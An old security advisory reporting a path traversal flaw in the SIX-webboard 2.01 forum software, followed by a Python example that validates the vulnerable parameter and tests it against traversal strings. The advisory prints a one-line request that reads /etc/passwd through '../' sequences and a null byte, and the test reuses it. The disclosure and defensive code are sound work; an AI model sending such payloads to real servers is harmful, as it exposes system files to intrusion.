SIX-webboard 2.01 "show files" vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2001-08-14T00:00:00


* a little bit late, but "it's better late than never"! *

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-

-NAME: SIX-webboard 2.01 "show files" vulnerability.

-DESCRIPTION: Little, but very popular webboard coded by Pipo ( Find more information about the SIX-webboard here: or

-PROBLEM: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retrieve files from the remote server which should not normally be accessible.

-EXPLOIT: ?content=../../../../../../../../../etc/passwd%00&board=boardsname
!The above line if given will output the file contents of /etc/passwd

-AUTHORs: Discovery: digitalseed and k$en0r Advisory: digitalseed

-DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk.

-COPYRIGHT: PoizonB0x Crew - (c) 2000-2001

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
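
The PROBLEM section above comes down to a missing check on the "content" parameter. The following is an added example, not code from the advisory or from SIX-webboard, showing one way to validate such a value before it reaches the filesystem. The function names, the allow-list pattern, the "boards" directory and all sample values except the string quoted from the advisory are assumptions made for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote_to_bytes

# Assumption: legitimate content names are short tokens with no dots or slashes.
SAFE_NAME = re.compile(rb"[A-Za-z0-9_-]{1,64}")


def resolve_content(base_dir, raw_value):
    """Return the real path for a raw `content` value, or None if rejected."""
    name = unquote_to_bytes(raw_value)       # decode %XX exactly once
    if b"\x00" in name:                      # %00 would truncate a C-level path
        return None
    if not SAFE_NAME.fullmatch(name):        # allow-list excludes '.', '/' and '\'
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name.decode("ascii")))
    # Defence in depth: with symlinks followed, the path must still be in base.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo():
    """Check constructed sample values; returns {value: accepted}."""
    samples = [
        "msg0001",                                   # ordinary name
        "../../../../../../../../../etc/passwd%00",  # value shown in the advisory
        "..%2f..%2fetc%2fpasswd",                    # percent-encoded separators
        "msg0001%00.html",                           # NUL in front of a suffix
        "escape",                                    # symlink that leaves base
    ]
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "boards")
        os.mkdir(base)
        open(os.path.join(base, "msg0001"), "w").close()
        os.symlink(root, os.path.join(base, "escape"))
        return {s: resolve_content(base, s) is not None for s in samples}


if __name__ == "__main__":
    for value, accepted in demo().items():
        print("ACCEPT" if accepted else "REJECT", value)
```

The allow-list alone rejects every traversal form here; the realpath containment check is what catches the symlink case, which contains no '..' or '/' at all.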